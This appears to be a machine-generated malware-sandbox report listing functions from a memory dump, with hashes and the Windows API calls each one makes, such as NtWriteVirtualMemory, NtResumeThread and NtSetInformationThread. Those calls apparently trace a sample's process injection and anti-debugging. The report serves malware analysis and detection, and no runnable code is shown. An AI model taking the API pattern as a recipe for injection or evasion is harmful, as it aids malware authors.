                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationLibraryLoadThread
                                                          • String ID: 1.!T
                                                          • API String ID: 543350213-3147410236
                                                          • Opcode ID: ba8cae9e3394eefc33c88bbabda5de07060fbe03461cf88dce803e5719c0a195
                                                          • Instruction ID: fcc65b539c90b62b8226817695a9c62a2d95a16c7e2d2f15f59d1da0afca2094
                                                          • Opcode Fuzzy Hash: ba8cae9e3394eefc33c88bbabda5de07060fbe03461cf88dce803e5719c0a195
                                                          • Instruction Fuzzy Hash: F421E177B203469EEB10AFB08CA87FA3B51AF43364F544255DC925F1CCD76094C2CA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02262592, Relevance: 1.8, APIs: 1, Instructions: 334nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02264B30: LoadLibraryA.KERNELBASE(?,8802EDAC,?,022654AF,02260496,2D9CC76C,DFCB8F12,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 02264BDB
                                                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02262A5D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoadMemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3569954152-0
                                                          • Opcode ID: d4a09fda0bd2d5187da954fc1b0948303905544535f44d136175549629467f13
                                                          • Instruction ID: 8b10becb050c2b0bd514006fc16481db0d0f4233f8fe45a31fa2cfd592d04f8a
                                                          • Opcode Fuzzy Hash: d4a09fda0bd2d5187da954fc1b0948303905544535f44d136175549629467f13
                                                          • Instruction Fuzzy Hash: 21B12372760306EFFB211EA4CC9ABF9366AEF01744F954124FE856B188C7F998D49B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022625E5, Relevance: 1.8, APIs: 1, Instructions: 291COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 191cdedfc24a064b011cccfdfeade11531af10e378c7aa2a612ec41c681f7cab
                                                          • Instruction ID: 9ff5f4c25c0887d4f5629fda3013024e765d7f426d4e765074e28ce749c763be
                                                          • Opcode Fuzzy Hash: 191cdedfc24a064b011cccfdfeade11531af10e378c7aa2a612ec41c681f7cab
                                                          • Instruction Fuzzy Hash: 98A13672760306EFFB215EA4CC9EBF53A6AEF01344F954228EE85571C8C7B958D88B44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226263A, Relevance: 1.8, APIs: 1, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 652e6ce7adab723b0d393db6759196805dd989f70586daab12df35e2c969da3c
                                                          • Instruction ID: 5e2afdbbaa259681fc6657c2dbbd02e6323cac35e961563b677a5f5efd7c309b
                                                          • Opcode Fuzzy Hash: 652e6ce7adab723b0d393db6759196805dd989f70586daab12df35e2c969da3c
                                                          • Instruction Fuzzy Hash: 48915672760306EFFB215EA4CC9EBF5366AEF01344F954224EE855B188C7F998D88B44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02262644, Relevance: 1.8, APIs: 1, Instructions: 272nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02264B30: LoadLibraryA.KERNELBASE(?,8802EDAC,?,022654AF,02260496,2D9CC76C,DFCB8F12,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 02264BDB
                                                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02262A5D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoadMemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3569954152-0
                                                          • Opcode ID: bb2aa3316eb97039bbcb026baf6c0889e713b12e84c187a5119b48573abd46c7
                                                          • Instruction ID: 0469a8e3752dcbee07903b240ddaed33016be5add61ad9ce2da9c2a53a0af7f1
                                                          • Opcode Fuzzy Hash: bb2aa3316eb97039bbcb026baf6c0889e713b12e84c187a5119b48573abd46c7
                                                          • Instruction Fuzzy Hash: AE913572760306EFFB215EA4CC9EBF5366AEF01344F954224EE8567188C7B998D89B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02262698, Relevance: 1.8, APIs: 1, Instructions: 262COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fff4dd3bda3b43a45c62b4b6056545579b753c49ef5f4b0d604379a6ea850c1
                                                          • Instruction ID: 6e6d119fbab3a657cccf079f927977f1a494c98c46da36d88625a3309418bff6
                                                          • Opcode Fuzzy Hash: 8fff4dd3bda3b43a45c62b4b6056545579b753c49ef5f4b0d604379a6ea850c1
                                                          • Instruction Fuzzy Hash: C3914772660306EFFB215EA4CC9EBF53766EF01344F994528ED8557289C7BA54D8CB00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022626FD, Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28b2aa6c24a747ac73f990e7f0c4745d231940d64f1ab95895e661a43c889f9d
                                                          • Instruction ID: a881b34e80366967199ff493f6203f50d3cf9aeb71908f26c8ce990b53b5c233
                                                          • Opcode Fuzzy Hash: 28b2aa6c24a747ac73f990e7f0c4745d231940d64f1ab95895e661a43c889f9d
                                                          • Instruction Fuzzy Hash: 8E713772660306EFFB215EA4CC9EBF53666EF01344F994624ED855B288C7B954D8CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02262764, Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d1f139eb9c2afef9a00bf122f670c0f78528c4a2fd352b456ae32f692155377
                                                          • Instruction ID: e116a6a291d7aba7353cfc43b948f549b5f89f19c99a907d911e0ee9c3cf40e9
                                                          • Opcode Fuzzy Hash: 3d1f139eb9c2afef9a00bf122f670c0f78528c4a2fd352b456ae32f692155377
                                                          • Instruction Fuzzy Hash: 24614672660306EFFB204EA0CC9EBE5376AEF01344F954524ED859B2C8C7B998D8CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022627DA, Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e34875d8b8c94dce66f8e50ec7efa597c3ce3003976febf6ba883ae92fc7cc85
                                                          • Instruction ID: 1fa2ca8bb1b59e4b0d9e9ec9cf6a96a9091a9aae1462466b0384e35a8439545a
                                                          • Opcode Fuzzy Hash: e34875d8b8c94dce66f8e50ec7efa597c3ce3003976febf6ba883ae92fc7cc85
                                                          • Instruction Fuzzy Hash: D451257276034AAFFB211EA0CC9EBF9362AEF05344F594524FD816B1D9C7B958C89B00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226283B, Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a4a118c24f8ea76d5c3173193b320cf7c794ab82960382190adfcfc88e3dacb
                                                          • Instruction ID: 962a1d6302cee6b501e0df07012b674064bf03446bdf6bc2d129ae1c3d865ec4
                                                          • Opcode Fuzzy Hash: 9a4a118c24f8ea76d5c3173193b320cf7c794ab82960382190adfcfc88e3dacb
                                                          • Instruction Fuzzy Hash: F9512832660306EFFB215EA0CCDEBF5362AEF05344F990514FE815B198C7B958D49B00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022628BC, Relevance: 1.6, APIs: 1, Instructions: 135nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02262A5D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 0b21fd4217c911d8bc5265357ca99fc0622659bcbff610b2d8ad847b117ee8a3
                                                          • Instruction ID: 30f067f7e500aa9f87ba09b37eb43b4708032adfd46acb65405e37b9366f99f8
                                                          • Opcode Fuzzy Hash: 0b21fd4217c911d8bc5265357ca99fc0622659bcbff610b2d8ad847b117ee8a3
                                                          • Instruction Fuzzy Hash: 39414472660306EFFB210EA0DCDEBF5366AEF05344F994524EE819B198C7B958D8CB00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02266266, Relevance: 1.6, APIs: 1, Instructions: 125nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: e01c8b38166cd1c3882caf2bcf227c181336954dfc3421f2232ef4963903f195
                                                          • Instruction ID: 01cb1d0b805637a86734db716021b3ee7de5b933e0e8991287878a5f3a42c44a
                                                          • Opcode Fuzzy Hash: e01c8b38166cd1c3882caf2bcf227c181336954dfc3421f2232ef4963903f195
                                                          • Instruction Fuzzy Hash: 13412B33674307CEDB2859E4D6AC3F5235A9F41798F59522DCD928B89CD3AC84C4CA41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226629C, Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b96ac244b5475f630d3dad9b59a12b1c4c6ecf3356468d58545025444cce6f8
                                                          • Instruction ID: 8dd14d10169bd94d588ed8b74c87c6a339490d90e126829d001f62bdad86eb1d
                                                          • Opcode Fuzzy Hash: 0b96ac244b5475f630d3dad9b59a12b1c4c6ecf3356468d58545025444cce6f8
                                                          • Instruction Fuzzy Hash: 2B413633675706CEDB245AD4D5AC7B43369AF41798F5D416ECD928B89CC3AD84C4CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226626E, Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 835f7ae6b92223f474ae9016dbad54541db486ba9db6bd04c4023ab9fdd8bd4a
                                                          • Instruction ID: 680a118a9ee1cc9837f50d615e54e451884e3403bf2eed7f0646b77d0ad4d16d
                                                          • Opcode Fuzzy Hash: 835f7ae6b92223f474ae9016dbad54541db486ba9db6bd04c4023ab9fdd8bd4a
                                                          • Instruction Fuzzy Hash: BC414633675307CEDB249AD4D5AC7B4236A9F01798F89426ECD928B89CC3AD88D4CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022662EA, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71079ba16aa554b6b98f3c6128eaa23f4bcbc0ee06e60bbbb8778faecd680801
                                                          • Instruction ID: c0638f4d00685065d9ab3b12b884b3dc0bf0f37208d4c5ebff3b228df185e0a2
                                                          • Opcode Fuzzy Hash: 71079ba16aa554b6b98f3c6128eaa23f4bcbc0ee06e60bbbb8778faecd680801
                                                          • Instruction Fuzzy Hash: 86414633674742CEDB249E94D5ACBB43769EF02394F59826EC9A28B89CC37D94D4CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022662C5, Relevance: 1.6, APIs: 1, Instructions: 113nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: ba6ff2d2c9c00034da07b041c571ef8448d83bc70235202caff04aa7a88fa02a
                                                          • Instruction ID: 9694b10fe74d77f210188a17bb04ca0e19f95f4ad2724af31c4fb9b5d17bf0e8
                                                          • Opcode Fuzzy Hash: ba6ff2d2c9c00034da07b041c571ef8448d83bc70235202caff04aa7a88fa02a
                                                          • Instruction Fuzzy Hash: B6314833674743CEDB285AE4D56C7F52369DF017A8F59526ECD928B89CC3AD84C4CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02266335, Relevance: 1.6, APIs: 1, Instructions: 105nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: c9681b51fd7e9ae028c9d35c742f2118059842774e82f64b490e18024646fcd9
                                                          • Instruction ID: 7bdd1c58387466ffbe2324a21ade81c7c567669789e601debd4d990e8f2a3c32
                                                          • Opcode Fuzzy Hash: c9681b51fd7e9ae028c9d35c742f2118059842774e82f64b490e18024646fcd9
                                                          • Instruction Fuzzy Hash: 8F313733275706CEDB285AA4D5AC7F52369EF017A8F59925ECD928B89CC36D84C4CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02262942, Relevance: 1.6, APIs: 1, Instructions: 104nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02262A5D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 7583ed7b980f83fd2eea25803e2e336fc05f0b33edbf509eb0ee26c09af192d5
                                                          • Instruction ID: 9e028ef777c1885794955348cebcae8a6061a4d868908e6e2ed54708aeff135b
                                                          • Opcode Fuzzy Hash: 7583ed7b980f83fd2eea25803e2e336fc05f0b33edbf509eb0ee26c09af192d5
                                                          • Instruction Fuzzy Hash: 5331643266030AEFEB214EA0CCD9BE9376AFF04344F994628ED8557198C7BA58D4CB00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022663AA, Relevance: 1.6, APIs: 1, Instructions: 101nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 10c3f90506049bc06731264a38e30552fa78df9a6b3dfc68711287b44cb0cb2d
                                                          • Instruction ID: c74211c12b444d99ab69598f7eac9201758ebc7cb6aad00e6f7613b982fddda7
                                                          • Opcode Fuzzy Hash: 10c3f90506049bc06731264a38e30552fa78df9a6b3dfc68711287b44cb0cb2d
                                                          • Instruction Fuzzy Hash: A6316433634753CEDB248AA4D59C7B43369EF023A4F5982ADC9628BCACC72C94C1CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022663A0, Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 0a5e128085d988632e82376b7833346f65438cd6b70314cc198d4672cda5fa77
                                                          • Instruction ID: f8d286e6e24959dcc0e2c1f57a6bef2690c2880f8f11e1bc069e2216af7990db
                                                          • Opcode Fuzzy Hash: 0a5e128085d988632e82376b7833346f65438cd6b70314cc198d4672cda5fa77
                                                          • Instruction Fuzzy Hash: 2B312B33275307CEDB285AA4D5AC3F5236AEF113A8F59921DCD52879ACD37C88C4CA41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02266455, Relevance: 1.6, APIs: 1, Instructions: 89nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: cfbbbae9b0e32a3c286f6a8c759ba522c7d0fe47ec715c3d50cba1e8339ba53d
                                                          • Instruction ID: d8aa847b3075712847e0f6b85485b45fa38fd5dee64b8e9d0b00b4f762f8b186
                                                          • Opcode Fuzzy Hash: cfbbbae9b0e32a3c286f6a8c759ba522c7d0fe47ec715c3d50cba1e8339ba53d
                                                          • Instruction Fuzzy Hash: 6F316837665B53CEE7348A94D59CBB43769EF023A4F9982ADC952478EDC72D90C0CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022663F8, Relevance: 1.6, APIs: 1, Instructions: 88nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 1c85740602a0265d1bdac12adb073c6500d29e97ba621cab6d743b6fee433da6
                                                          • Instruction ID: 0416d900584df31e5de52afc2ba56a12c97654798c983e2ec3bda973eba5ce4a
                                                          • Opcode Fuzzy Hash: 1c85740602a0265d1bdac12adb073c6500d29e97ba621cab6d743b6fee433da6
                                                          • Instruction Fuzzy Hash: 16313333661717CEDB289AA4D5AC7F43369EF013A8F59925EC98287DACC37C84C4CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226641E, Relevance: 1.6, APIs: 1, Instructions: 87nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 18c93c8d29343b16d6d388fec572bf83f90b4c47b15a6e53e77ce1594b32db5a
                                                          • Instruction ID: f9bac94472434d9dd142fa0e60c1934e6b19c91f3f76fac4ea95af6d37fad68c
                                                          • Opcode Fuzzy Hash: 18c93c8d29343b16d6d388fec572bf83f90b4c47b15a6e53e77ce1594b32db5a
                                                          • Instruction Fuzzy Hash: A5317823670707CEDB349AA4D96C7B43769EF013A8F99926DC99247CEDC76D84C4CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226066A, Relevance: 1.6, APIs: 1, Instructions: 85nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID:
                                                          • API String ID: 4046476035-0
                                                          • Opcode ID: 08ff128d867738cc880c3d43ee236e34ea542b9ee16333389a26661648e9a424
                                                          • Instruction ID: e3e1cb6fc2f7ebcfdd1a03c9fa05dd941bc7af1e49518f914dacdcf7b7c75dbf
                                                          • Opcode Fuzzy Hash: 08ff128d867738cc880c3d43ee236e34ea542b9ee16333389a26661648e9a424
                                                          • Instruction Fuzzy Hash: A721BB77B653968EEB019FB089683FA7B60BF43324F584295DD920F1CEC25498C1CA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022664A4, Relevance: 1.6, APIs: 1, Instructions: 83nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 1a056a305f7630a5d6353fd9b803c3da42c2e7310dd26ac040ea8115d4684f61
                                                          • Instruction ID: 1a52c2303cd4eb95f22f1bb523b59859a4eb3c5ccb1b6bf6fb87e74898aa1524
                                                          • Opcode Fuzzy Hash: 1a056a305f7630a5d6353fd9b803c3da42c2e7310dd26ac040ea8115d4684f61
                                                          • Instruction Fuzzy Hash: 12318E33625757CEDB208A94D89C7B83768EF023A8F5996ADC9524789DC33D80C1CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022629BD, Relevance: 1.6, APIs: 1, Instructions: 82nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02262A5D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 33f8d2d314f0f641a533c35063353e9d3cee5047baaaba5d208dd4de8776fd21
                                                          • Instruction ID: 2575570272639613985a0be4354d27d81823084f17d2bfbe5b293f73d1de66a7
                                                          • Opcode Fuzzy Hash: 33f8d2d314f0f641a533c35063353e9d3cee5047baaaba5d208dd4de8776fd21
                                                          • Instruction Fuzzy Hash: 23312632660346EFEB215EA0CC99BE97B6BFF06340F994628ED8557198CB7A54D4CB00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02263A1C, Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(022617CC,?,00000000,?,00000050,00000361,?,02263DF2,?,?), ref: 02263AFE
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a0f12cd36c7cda622ed387e892a5c9a6b437b8603479264cf211dc1d6716ed55
                                                          • Instruction ID: 11059a843807bc9972afed9e2810bbc26bdf0c470c478e6ac80dbb8c3d1ec0ad
                                                          • Opcode Fuzzy Hash: a0f12cd36c7cda622ed387e892a5c9a6b437b8603479264cf211dc1d6716ed55
                                                          • Instruction Fuzzy Hash: 5C21773766E7D28AC332CBB4C898A567F60FF53B1032C84DDC0C28A497CA53A811E742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02266566, Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 3091a9b15157456b057fcfaf467f903250b94ab808deb17b4c4b3b98daa346a6
                                                          • Instruction ID: dd45a457b3c430ffaf5d8cbeb6f6879c0d8a5f1d32ee9ed0c1b7fc5a6cb20000
                                                          • Opcode Fuzzy Hash: 3091a9b15157456b057fcfaf467f903250b94ab808deb17b4c4b3b98daa346a6
                                                          • Instruction Fuzzy Hash: A72156335316978ED724CAA4D49C7B43768EF023A8F5886ADC5524B86DC73E90C0CB01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022606EA, Relevance: 1.6, APIs: 1, Instructions: 76nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID:
                                                          • API String ID: 4046476035-0
                                                          • Opcode ID: e08fab55592dbcf157698e0db58e51aae5a8385a6248d5f3659d0302a4ea9101
                                                          • Instruction ID: 792db2f227ca43a7692d1bab8b34ffd7f3ad43cbbb8fe20afb6d21695a4233eb
                                                          • Opcode Fuzzy Hash: e08fab55592dbcf157698e0db58e51aae5a8385a6248d5f3659d0302a4ea9101
                                                          • Instruction Fuzzy Hash: 64219077B257929EF710EF60CC987F93B50EF43354F5945A9DCA14B1CDC6506482CA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02266629, Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,022603D9,00000000), ref: 022665DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 6e9adcf20ae69ffcdea4cf69ebccb3fe91de4ad3340483b09310981a5930262e
                                                          • Instruction ID: 950217e1b0fb70fbf8413a68ea25321af05de4c84bb289129ca027244762686a
                                                          • Opcode Fuzzy Hash: 6e9adcf20ae69ffcdea4cf69ebccb3fe91de4ad3340483b09310981a5930262e
                                                          • Instruction Fuzzy Hash: F5115923129AD38ED32697B4D4683B47F29AF03248F5C42EEC5D18E89BCB1F4082C741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

